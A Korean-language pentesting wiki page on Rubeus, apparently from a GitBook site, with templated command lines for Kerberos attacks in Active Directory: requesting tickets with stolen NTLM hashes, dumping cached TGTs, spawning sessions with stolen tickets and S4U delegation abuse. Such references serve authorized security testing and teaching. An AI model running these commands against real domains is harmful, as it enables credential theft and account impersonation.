펜테스팅 위키
  • Welcome
    • Home
  • 정보 수집
    • OSINT
      • Sub Domain
      • Google Hacking
      • Github
      • IP Address
      • Employees
    • 내부망
      • RID Cycling
      • Password Spraying
      • Password Must Change
      • Extension
        • xlsx/ods
        • pfx
        • vhd
        • pst
        • vbs
        • hc
      • Protocol
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 23 - Telnet
        • 53 - DNS
        • 80/443 - HTTP
        • 88 - Kerberos
        • 111 - RPC
        • 135 - msrpc
        • 139/445 - SMB
        • 389/636 - LDAP
        • 1433 - MSSQL
        • 5985/5986 - wsman
  • 초기 침투
    • CVEs
      • CVE-2025-31486
    • Phishing
      • Command File
      • EXE + LNK
      • wax
      • Microsoft Word
    • Web
      • Quary Language
        • SQL
        • GraphQL
      • File Upload
      • File Download
      • XSS
      • SSRF
      • CSRF
      • Open Redirect
      • SOP / CORS
    • ZIP Slip
  • 지속성
    • Active Directory
      • Golden Tickets
      • Diamond Tickets
      • DC Shadow
      • RID Hijacking
      • Certificate
    • Local
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM
      • WMI Event Subscription
      • SSH Key Injection
      • DLL Hijacking
      • DLL SideLoading
      • Create Account
  • 권한 상승
    • Active Directory
      • DACL
        • ReadGMSAPassword
        • ReadLAPSPassword
        • ForceChangePassword
        • AddSelf
        • WriteOwner
        • GenericAll
        • GenericWrite
        • WriteSPN
        • AddMembers
        • WriteProperty
        • WriteGPO
        • AddAllowedToAct
        • AllExtendedRights
      • AD CS
        • Abuse Permissions
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC5
        • ESC6
        • ESC7
        • ESC8
        • ESC9
        • ESC10
        • ESC11
        • CVE-2022-26923
        • Non-PKINIT
      • MS14-068
      • Server Operators
      • DnsAdmins
      • noPac
      • Silver Tickets
      • KrbRelayUp
      • GPO
    • Windows
      • SeImpersonatePrivilege
      • Unquoted Service Path
      • Weak Service Permissions
      • Weak Service Binary Permissions
      • UAC Bypass
      • Always Install Elevated
      • Autoruns
      • Credential Manager
      • Local Service Account
  • 민감정보 탈취
    • Active Directory
      • Kerberoasting
      • Targeted Kerberoast
      • ASRep-Roasting
      • AS Requested Service Tickets
      • Unconstrained Delegation
      • Constrained Delegation
      • Alternate Service Name
      • Resource Based Constrained Delegation
      • DCSync
      • LSASS
      • Shadow Credentials
      • Backup Operators
      • SeEnableDelegationPrivilege
      • Domain Cached Credentials
      • Network Access Account Credentials
    • Windows
      • Unattended File
      • DPAPI
      • Hard-coding Credentials
      • SeBackupPrivilege
  • 측면 이동
    • File Transfer
      • SCP
      • ZIP
      • ncat
      • Python
      • PowerShell
      • certutil
      • wget
      • SMB
      • Base64
      • FTP
      • WebDav
      • cURL
    • Pivoting
      • SOCKS
      • Proxifier
      • Remote Port Forwarding
    • NTLM Relay
    • WebDAV Relay
    • WinRM
    • PsExec
    • WMI
    • DCOM
    • RDP
    • Port Forwarding
    • Domain Trust Discovery
  • 사용자 가장
    • Pass the Hash
  • Pass the Ticket
  • Overpass the Hash
  • Token Impersonation
  • Make Token
  • Process Injection
  • ETC
    • CS
      • Active Directory
      • Kerberos
      • NTLM
      • PKINIT
      • Integrity
      • Registry
      • Active Directory Trusts
      • Delegation
      • OAuth 2.0
      • S4U
      • SCCM
      • SID History
    • Tools
      • Cobalt Strike
      • BloodHound
      • Rubeus
      • Certipy-ad
      • LDAP Search
      • Hydra
      • Hashcat
Powered by GitBook
On this page
  • Pass the Hash
  • Pass the Ticket
  • Delegation

Was this helpful?

Export as PDF
  1. ETC
  2. Tools

Rubeus

Rubeus는 Active Directory 환경에서 Kerberos 인증 프로토콜을 악용하기 위해 개발된 C# 기반의 오픈소스 도구입니다. 단순하게 Kerberoasting과 ASRep-Roasting과 같은 공격 이외에도, AES256/NTLM 해시 등을 수집했을 때 사용자를 가장하는 모듈과 Pass the Ticket, Overpass the Hash 기법도 지원합니다.

Pass the Hash

NTLM / AES256과 같은 해시는 그 자체로 티켓을 생성하는데 사용할 수 있습니다. 하지만 새로 생성한 머신 계정의 해시는 등록되어있지 않기 때문에 추가적으로 계산해줍니다.

# 계정의 해시 계산
./Rubeus.exe hash /user:<user> /password:<pass> /domain:<domain> 

# 사용자의 Hash 탈취 후 티켓 생성
./Rubeus.exe asktgt /user:<user> /ntlm:<ntlm hash> /nowrap 

Pass the Ticket

Rubeus에서 PtT 기법을 사용하기 위해서는 다음과 같은 상황이 있습니다.

  1. 사용자의 TGT를 탈취

  2. 높은 권한을 통해 로컬에 저장된 사용자 TGT 탈취

2번은 1번의 과정 전에 로컬에 캐시된 사용자 TGT를 열거하는 과정만 추가되기에 명령어는 비슷합니다.

# 로컬에 캐시된 사용자 TGT 열거
./Rubeus.exe triage

# 열거된 티켓 중 LUID를 지정하여 티켓 탈취
./Rubeus.exe dump /luid:<luid> /service:krbtgt /nowrap

# 티켓을 통해 사용자 세션 생성
./Rubeus.exe createnetonly /ticket:<ticket> /program:C:\Windows\System32\cmd.exe 

Delegation

# Delegation
./Rubeus.exe s4u /impersonateuser:<target user> /nsdsspn:<target svc> /user:<user> /ticket:<ticket> /nowrap

# 티켓을 통해 사용자 세션 생성
./Rubeus.exe createnetonly /ticket:<ticket> /program:C:\Windows\System32\cmd.exe 
PreviousBloodHoundNextCertipy-ad

Last updated 4 days ago

Was this helpful?